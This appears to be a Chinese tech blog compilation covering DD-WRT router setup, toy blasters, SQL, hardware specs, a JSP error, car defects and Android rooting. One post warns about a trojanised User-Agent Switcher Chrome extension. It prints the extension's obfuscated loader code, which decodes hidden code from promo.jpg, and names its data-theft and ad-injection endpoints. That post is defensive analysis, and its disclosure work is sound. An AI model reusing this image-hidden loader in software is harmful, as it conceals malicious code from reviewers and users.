WNDR3800刷DD-WRT+DDNS+远程WEB SSH管理+远程唤醒内网机

刷机

进DD-WRT官网下载WNDR3800固件, 根据网上的经验,先把wndr3800的原厂固件版本从1.0.0.52降级到1.0.0.16。然后再从web管理界面上传dd-wrt的wndr3800-factory.img刷机。等待一会儿就刷机成功了。

打开JFFS

默认dd-wrt的整个文件系统都是只读的。/tmp目录是内存,重启路由器之后文件就没了。所以需要打开JFFS(Journalling Flash File System (JFFS/JFFS2) is a re-writable area within a DD-WRT-enabled device.)功能。
打开JFFS的步骤:打开路由器管理界面。跳转到JFFS支持节点
点击Enable JFFS 点击保存,等待一会点击应用。
等待一会儿。点击Enable Clean JFFS。不要点击保存,点击应用。这是路由器会格式化剩余的空间。
等待片刻,将Clean JFFS Disable掉。点击保存。重启路由器,此时路由器应该有几MB的永久存储空间了。通过/jffs目录可以访问,存取文件。

DDNS动态域名

刚开始打算用dnspod的ddns,折腾了半天的linux shell发现dnspod的ddns修改了接口,出现record line invalid等错误。为了让ddns提前能用,改用3322.org。这个太简单了。ddwrt已经内置了3322.org,填写进你的用户名密码和***.f3322.net的免费动态域名即可。我这里force update interval设置的是1。表示每一天强制更新一个ip。

远程管理ssh+web

很有可能电信isp会禁用默认的80、21、22等端口,我设置一个10000以上的大端口号就行。在Adminsitration – Management – Remote Access里面分别设置WebGUI、SSH、Telnet等服务的端口号即可。

WOL 远程唤醒内网机

方法也很简单, 内网需要环境的主机mac地址记录以下,然后在Administration – WOL 里面设置需要唤醒的内网主机MAc地址和广播地址即可。点击Wake Up即可开机。关机也很简单,写一个批处理内容:shutdown -t 0 -s
要想让内网机支持wol,必须电脑主板支持此功能,一般在bios的高级电源选项里面有Wake on Lan,Wake on PCI(E)之类的设置。我七彩虹H61 UEFI主板里面的名字叫PME启动,选择启用,然后F10保存。进入Windows设备管理器设置网卡高级选项。把网络唤醒,魔法包唤醒都开启。然后在电源管理选项里面。把第一个选项“允许此计算机关闭此设备以节约用电”去掉勾选。第二个“允许此设备唤醒此计算机”勾选上。

适合三岁的nerf软弹枪


手动:
jolt blaster,拦截 拉杆太紧,3岁小娃拉不动
Nerf N-Strike Elite Triad EX-3 Blaster A3845 闲鱼30全新 俗称:三炮。凌鹰。
Nerf N-Strike 精英系列夜巡软弹枪 俗称:烈焰、精夜(精英夜巡)70淘宝全新
Nerf Element EX 6 Tru Exclusive] 俗称:元素枪(六元素)
电动:
死拽夫A0711 基本上电枪才能连发 STRYFE算尺寸比较小的点电枪 或者小牛 手动上膛六发连发

Chrome插件User-Agent Switcher为木马程序,请尽快卸载

User-Agent Switcher for Google Chrome
提供方:useragentswitcher.org
此为插件里面包含恶意代码。
useragentswitcher.org提供的插件都不要下载。很是怀疑!

今天打开京东jd.com自动跳转到一些莫名其妙的网站。他会记录你的访问记录并发送到他的服务器(https://uaswitcher.org/logic/page/data)。chrome商店里面从2017年就有人举报此插件有毒。现在2018年年末的Chrome官方还提供下载。可见官方审核并不严格且效率低下。

恶意程序,访问京东jd.com会定时进行跳转 http://rtbs24.com/?target=https%3A%2F%2Fytthn.com%2Fclick-IQL4686A-HFDQCIIE%3Fbt%3D25%26tl%3D1%26sa%3D116%26url%3Dhttps%3A%2F%2Fwww.jd.com%2F,真心垃圾

大家不要用了,这个扩展含有木马。

为了绕过 chrome 的审核策略,他把恶意代码隐藏在了 promo.jpg 里。

然后 background.js 的第 80 行,从 promo.jpg 图片里解密出恶意代码并执行。

包含的行为包括:

会把你打开的每个 tab 的 url 等信息加密发送到 uaswitcher.org/logic/page/data

另外还会从 api.data-monitor.info/api/bhrule?sub=116 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码。

详情讨论见:www.v2ex.com/t/389340

chrome 商店搜索 User-Agent Switcher,排第一的这个插件(45 万用户),是一个木马…

https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake

为了绕过 chrome 的审核策略,他把恶意代码隐藏在了 promo.jpg 里
background.js 的第 80 行,从这个图片里解密出恶意代码并执行

t.prototype.Vh = function(t, e) {
            if ("" === '../promo.jpg') return "";
            void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
            var n = this.ET,
                i = e.mp || n.mp,
                o = e.Tv || n.Tv,
                h = e.At || n.At,
                a = r.Yb(Math.pow(2, i)),
                f = (e.WC || n.WC, e.TY || n.TY),
                u = document.createElement("canvas"),
                p = u.getContext("2d");
            if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
            e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
            var c = p.getImageData(0, 0, u.width, u.height),
                d = c.data,
                g = [];
            if (c.data.every(function(t) {
                    return 0 === t
                })) return "";
            var m, s;
            if (1 === o)
                for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
            var v = "",
                w = 0,
                y = 0,
                l = Math.pow(2, h) - 1;
            for (m = 0; m < g.length; m += 1) w += g[m] = h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);
            return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
        }

会把你打开的每个 tab 的 url 等信息加密发送到 https://uaswitcher.org/logic/page/data
另外还会从 http://api.data-monitor.info/api/bhrule?sub=116 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码.
根据 threatbook 上的信息( https://x.threatbook.cn/domain/api.data-monitor.info ),我估计下面的几个插件都是这个作者的作品..
https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm

https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah

https://chrome.google.com/webstore/detail/%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C-%D0%BC%D1%83%D0%B7%D1%8B%D0%BA%D1%83-%D0%B2%D0%BA%D0%BE%D0%BD%D1%82%D0%B0%D0%BA%D1%82%D0%B5/hanjiajgnonaobdlklncdjdmpbomlhoa

https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg

这里也有人讨论这个问题 https://news.ycombinator.com/item?id=14889619

Chrome插件User–Agent Switcher恶意代码分析报告

User-Agent Switcher for Google Chrome Virus

https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake

Oralce 按时间区间作为筛选条件查询数据

select reply.assign_investigator1,reply.assign_investigator1_tel,reply.assign_investigator2,reply.assign_investigator2_tel,
assign.case_id
from CASE_T_ASSIGN_REPLY reply
left join case_t_assign assign on assign.assign_id = reply.assign_id
where
create_time between to_date(‘2018-11-21 00:00:21′,’yyyy-mm-dd hh24:mi:ss’) and to_date(‘2018-11-21 17:40:21′,’yyyy-mm-dd hh24:mi:ss’)
and assign_investigator1 is not null

戴尔Studio 560s G43T-DM1主板规格

戴尔Inspiron 560 服务标签: 1Y2BW2X 快速服务代码: 4236546345 Intel X4500 HD
主板,G43T-DM1 18D1Y G43+ICH10R
芯片组:INTEL G43
内存:4条 DDR3内存槽
775针 DDR3 775架构酷睿单核,酷睿2双核,酷睿2四核 Intel Core2 Quad Q9550 (130¥,排名850)
ECS G43T-DM1 G43 Motherboard. ECS meets the current and future demands of high performance, power embedded computing, making it ideal for communications, transaction terminal, interactive client, industrial automation applications as well as for standard home use.

Manufacturer: ECS ,台湾精英代工
Part Number: G43T-DM1 18DY1 018DY1 CN018DY1 CN-018DY1

Specifications:

Socket 775 architecture
mATX form factor
Intel G43 / ICH10 chipset
4 x 240-pin DDR3 DIMM slots
Supports up to 8 GB DDR3 dual channel memory (1066 MHz)
Integrated Intel Graphics Media Accelerator X4500 with up to 1759 MB dynamic video memory
Integrated Realtek ALC 888S 8-channel HD audio
Integrated Atheros AR8121-L1E Gigabit Ethernet LAN
4 x Serial ATA 3.0 Gb/s ports
24-pin ATX power connector
4-pin ATX12V power connector
Lead-free components (RoHS compliant)

Expansion Slots:

1 x PCI Express x 16 slot
2 x PCI Express x 1 slots
1 x PCI slot

I/O Ports:

1 x VGA port
1 x HDMI out
4 x USB 2.0 ports
1 x RJ-45 GbLAN
Line in, line out, microphone audio
Side, rear, c/sub audio

Internal Headers:

1 x SPDIF header
1 x front panel header
1 x front panel audio header
1 x CD-In
1 x 9-pin Serial/COM header
3 x USB 2.0 headers (six ports total)

Supported Processors:

Socket 775
1333/1066/800 MHz FSB speeds
Intel Core 2 Quad
Intel Core 2 Duo
Intel Pentium Dual-Core
Intel Celeron Dual-Core
Intel Celeron 4xx-series

Resource specification not allowed here for source level below 1.7

An error occurred at line: 34 in the jsp file: /pages/hbt/hjxf/ajaxYubei.jsp
Resource specification not allowed here for source level below 1.7
31:     String FlowId = request.getParameter("flowid");
32:     //读取json
33:     StringBuilder sb = new StringBuilder();
34:     try (BufferedReader reader = request.getReader())
35:         char[] buff = new char[1024];
36:         int len;
37:         while ((len = reader.read(buff)) != -1) {

34行报错,此问题是因为try里面加语句的写法在source level 1.7及其以下的版本是不支持的。把try()括号里面的语句写到下面即可。

丰田RAV4座椅(供应商:长春富维-江森)生锈,2.5天窗漏水

2012款及之前的款,都是天津一汽生产的,生产线自动化程度高,质量很好

2013、2015款,是在四川一汽长春丰越公司生产的,问题不少!

据了解至少2013到2015的座椅都生锈:供应商:长春富维-江森自控汽车饰件系统有限公司

一汽富维受益于一汽大众等下游核心客户市场份额提升。公司主要产品包括汽车内饰、外饰、车轮和车身电子,主要客户为一汽集团的一汽大众、一汽丰田、一汽轿车等。今年1-5月一汽大众销售75万辆,同比增长25%;一汽轿车销售12万辆,同比增长33%;均显著好于行业平均水平。受益于下游核心客户的市场份额提升,预计公司汇总收入有望实现较快增长。

1.png

2.png

2.5 双天窗漏水

漏水的都是2.5L“双天窗”的 Rav 4,

主要原因是后天窗设计的排水空简陋,在黏贴天窗的两圈胶之间有个简陋的排水孔

前天窗是半标准天窗(专利产品)

2.0是标准天窗,微翘、全开,都可以,排水槽也是天窗专利设计,一体化成型从A柱排水,无虑!

看看2.0标准天窗与2.5双天窗的后窗排水槽,你就知道为啥只有2.5漏水了。

上图是2.0标准天窗,排水槽是凹型软塑与A柱排水口一体化程度较高!

下图是2.5双天窗的后窗排水槽孔,两条胶带是粘天窗玻璃的,两条胶带构成排水槽。。。

MIUI10 红米4高配root + xposed

以下以(红米4高配3+32和miui 10开发版ROM为例进行步骤说明)

  1. 首先刷miui开发板。

  2. 在开发者选项,设备绑定里面绑定当前小米账号和设备。

  3. 关机,音量下+电源进入FastBoot模式。

  4. usb线连接手机和电脑,电脑下载小米解锁工具,按向导下一步,走到100%,解锁成功。这样BootLoader锁就解开了。

  5. 长按电源键,正常重启进入系统,打开安全中心,权限,开启ROOT权限,勾选我承担ROOT后的风险,然后点击开启ROOT。接下来回自动下载官方ROOT包并重启,只需要等待重启即可。

  6. 重启后,手机打开usb调试,连接电脑,在电脑cmd下运行以下命令来解锁system分区:

    adb.exe devices
    adb.exe root
    adb.exe disable-verity
    adb.exe reboot